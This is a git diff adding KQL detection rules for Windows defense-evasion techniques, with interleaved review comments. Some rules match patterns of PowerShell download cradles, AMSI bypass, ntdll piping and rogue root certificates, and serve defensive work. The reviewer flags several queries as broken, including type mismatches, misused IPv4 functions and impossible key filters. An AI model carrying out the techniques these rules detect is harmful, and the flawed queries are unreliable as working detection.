+// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\."
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..fcb58fe6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Firewall Rule Added Via Netsh.EXE
+// Author: Markus Neis, Sander Wiebing
+// Date: 2019-01-29
+// Level: medium
+// Description: Detects the addition of a new rule to the Windows firewall via netsh
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246
+// False Positives:
+// - Legitimate administration activity
+// - Software installations
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql
new file mode 100644
index 00000000..815bca1a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Process Created Via Taskmgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-13
+// Level: low
+// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
new file mode 100644
index 00000000..4c4e8b12
--- /dev/null
+++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
@@ -0,0 +1,14 @@
+// Title: New Root Certificate Installed Via CertMgr.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
+Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
new file mode 100644
index 00000000..3ad5cfca
--- /dev/null
+++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
@@ -0,0 +1,14 @@
+// Title: New Root Certificate Installed Via Certutil.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
+Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore" or ProcessCommandLine contains "–addstore" or ProcessCommandLine contains "—addstore" or ProcessCommandLine contains "―addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/node_process_executions.kql b/KQL/rules/Defense Evasion/node_process_executions.kql
new file mode 100644
index 00000000..a87cef39
--- /dev/null
+++ b/KQL/rules/Defense Evasion/node_process_executions.kql
@@ -0,0 +1,10 @@
+// Title: Node Process Executions
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: medium
+// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql
new file mode 100644
index 00000000..801ff407
--- /dev/null
+++ b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql
@@ -0,0 +1,10 @@
+// Title: Nslookup PowerShell Download Cradle - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: medium
+// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql
new file mode 100644
index 00000000..bed879da
--- /dev/null
+++ b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql
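Review bot: In the nslookup download-cradle rule the clause `ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe"` can never be true, because the original-file-name field holds a bare file name with no path separator; that alternative is dead and only the `FolderPath contains` branch does any work. It should read `ProcessVersionInfoOriginalFileName =~ "nslookup.exe"`, and `FolderPath endswith "\\nslookup.exe"` would be the tighter image match, consistent with the other rules in this commit.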
@@ -0,0 +1,10 @@
+// Title: NtdllPipe Like Activity Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-05
+// Level: high
+// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
new file mode 100644
index 00000000..2d47b001
--- /dev/null
+++ b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
@@ -0,0 +1,15 @@
+// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-05-27
+// Level: high
+// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
+The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
+malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
+by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
+hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(" and ProcessCommandLine contains ".Insert(" and ProcessCommandLine contains "UILevel") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql
new file mode 100644
index 00000000..13ec9462
--- /dev/null
+++ b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated PowerShell OneLiner Execution
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-05-09
+// Level: high
+// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://127.0.0.1" and ProcessCommandLine contains "%{(IRM $_)}" and ProcessCommandLine contains "Invoke") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql
new file mode 100644
index 00000000..d5d6c6d0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql
@@ -0,0 +1,12 @@
+// Title: Odbcconf.EXE Suspicious DLL Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ 
"odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql
new file mode 100644
index 00000000..a715d372
--- /dev/null
+++ b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql
@@ -0,0 +1,12 @@
+// Title: Office Application Initiated Network Connection Over Uncommon Ports
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-12
+// Level: medium
+// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control
+// False Positives:
+// - Other ports can be used, apply additional filters accordingly
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemotePort in~ ("53", "80", "139", "389", "443", "445", "3268")) or ((RemotePort in~ ("143", "465", "587", "993", "995")) and InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql
new file mode 100644
index 00000000..7fbac1fe
--- /dev/null
+++ b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql
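Review bot: `RemotePort in~ ("53", "80", ...)` in the Office uncommon-ports rule applies the case-insensitive string operator to a numeric column with quoted literals; `RemotePort` in DeviceNetworkEvents is an int, so this is likely to be rejected as a type mismatch rather than silently match. Both lists should take the numeric form, `RemotePort in (53, 80, 139, 389, 443, 445, 3268)` and `RemotePort in (143, 465, 587, 993, 995)`. Because the port test sits inside the `not(...)` exclusion, a failure here stops the whole rule from running rather than merely widening it.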
@@ -0,0 +1,12 @@
+// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: medium
+// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate enabling of the old tls versions due to incompatibility
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*" or RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1*") and RegistryKey endswith "\\Enabled"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql
new file mode 100644
index 00000000..bcda8393
--- /dev/null
+++ b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql
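Review bot: The key filter of the old-TLS rule cannot match: `RegistryKey endswith "...\\Protocols\\TLS 1.0*"` treats `*` as a literal character (KQL `endswith` has no wildcards), and even if it did, one key cannot end with both `TLS 1.0*` and `\\Enabled`, so the `and` is contradictory; in DeviceRegistryEvents the value name is carried in `RegistryValueName`, not appended to `RegistryKey`. The comparison `RegistryValueData =~ "DWORD (0x00000001)"` also looks like Sysmon's `Details` rendering; this table reports the raw data, so `"1"` is the more likely form — verify against a sample event. A predicate that expresses the intent is `(RegistryKey contains "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0\\" or RegistryKey contains "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1\\") and RegistryValueName =~ "Enabled" and RegistryValueData == "1"`.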
@@ -0,0 +1,12 @@
+// Title: OneNote Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of ".one" or ".onepkg" files from those locations
+
+DeviceFileEvents
+| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
new file mode 100644
index 00000000..dff6354b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
@@ -0,0 +1,14 @@
+// Title: OneNote.EXE Execution of Malicious Embedded Scripts
+// Author: @kostastsale
+// Date: 2023-02-02
+// Level: high
+// Description: Detects the execution of malicious OneNote documents that contain embedded scripts.
+When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\exported\\" or ProcessCommandLine contains "\\onenoteofflinecache_files\\") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\onenote.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql
new file mode 100644
index 00000000..268f65c5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql
@@ -0,0 +1,10 @@
+// Title: OpenWith.exe Executes Specified Binary
+// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
+// Date: 2019-10-12
+// Level: high
+// Description: The OpenWith.exe executes other binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
new file mode 100644
index 00000000..fa41dd99
--- /dev/null
+++ b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
@@ -0,0 +1,12 @@
+// Title: Outbound Network Connection Initiated By Cmstp.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects a network connection initiated by Cmstp.EXE
+Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.003
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql
new file mode 100644
index 00000000..7a45bdbf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql
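Review bot: The private-range exclusion in the cmstp rule passes IPv6 prefixes (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) to `ipv4_is_in_range`, which only understands IPv4 and yields null for those calls, so IPv6 loopback, link-local and ULA destinations are never excluded. If Kusto's three-valued logic propagates that null through the `or` chain and the outer `not(...)`, the predicate is null for every IPv4 event too and `where` drops the row, which would silence the rule entirely — worth confirming with a test query before merging. The three IPv6 entries should use the IPv6 helper, e.g. `ipv6_is_in_range(RemoteIP, "fe80::/10")`. The outbound_network_connection_to_public_ip_via_winlogon hunk carries the same exclusion list with the same issue.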
@@ -0,0 +1,12 @@
+// Title: Outbound Network Connection To Public IP Via Winlogon
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2023-04-28
+// Level: medium
+// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011
+// False Positives:
+// - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql
new file mode 100644
index 00000000..f4897dc8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql
@@ -0,0 +1,12 @@
+// Title: Outgoing Logon with New Credentials
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: low
+// Description: Detects logon events that specify new credentials
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550
+// False Positives:
+// - Legitimate remote administration activity
+
+DeviceLogonEvents
+| where LogonType == 9
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql
new file mode 100644
index 00000000..0781adc6
--- /dev/null
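Review bot: `| where LogonType == 9` in the Outgoing Logon rule compares against the Windows Security event 4624 numeric logon type, but as far as I know DeviceLogonEvents.LogonType is a string enumeration ("Interactive", "Network", "RemoteInteractive", …), so this either fails type-checking or never matches; the conversion has copied the Sigma value without mapping it to the table's representation. I could not find a documented DeviceLogonEvents value for NewCredentials (type 9), so the honest output may be to mark the rule as not directly convertible rather than emit a query that silently returns nothing, e.g. `// NOTE: Windows logon type 9 (NewCredentials) has no verified DeviceLogonEvents equivalent — confirm mapping before use`. Worth a pass over other rules that carry numeric LogonType or EventID values from the source.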
+++ b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: Password Provided In Command Line Of Net.EXE
+// Author: Tim Shelton (HAWK.IO)
+// Date: 2021-12-09
+// Level: medium
+// Description: Detects a when net.exe is called with a password in the command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
new file mode 100644
index 00000000..4ff2d80e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
@@ -0,0 +1,14 @@
+// Title: PDF File Created By RegEdit.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-08
+// Level: high
+// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
+This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\regedit.exe" and FolderPath endswith ".pdf"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ping_hex_ip.kql b/KQL/rules/Defense Evasion/ping_hex_ip.kql
new file mode 100644
index 00000000..3d380ea3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/ping_hex_ip.kql
@@ -0,0 +1,12 @@
+// Title: Ping Hex IP
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-23
+// Level: high
+// Description: Detects a ping command that uses a hex encoded IP address
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1027
+// False Positives:
+// - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "0x[a-fA-F0-9]{8}" and FolderPath endswith "\\ping.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql
new file mode 100644
index 00000000..a7595a4a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential 7za.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-06-09
+// Level: low
+// Description: Detects potential DLL sideloading of "7za.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql
new file mode 100644
index 00000000..8b98624d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Adplus.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: high
+// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate usage of Adplus for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql
new file mode 100644
index 00000000..c052d00a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql
@@ -0,0 +1,10 @@
+// Title: Potential AMSI Bypass Using NULL Bits
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: medium
+// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
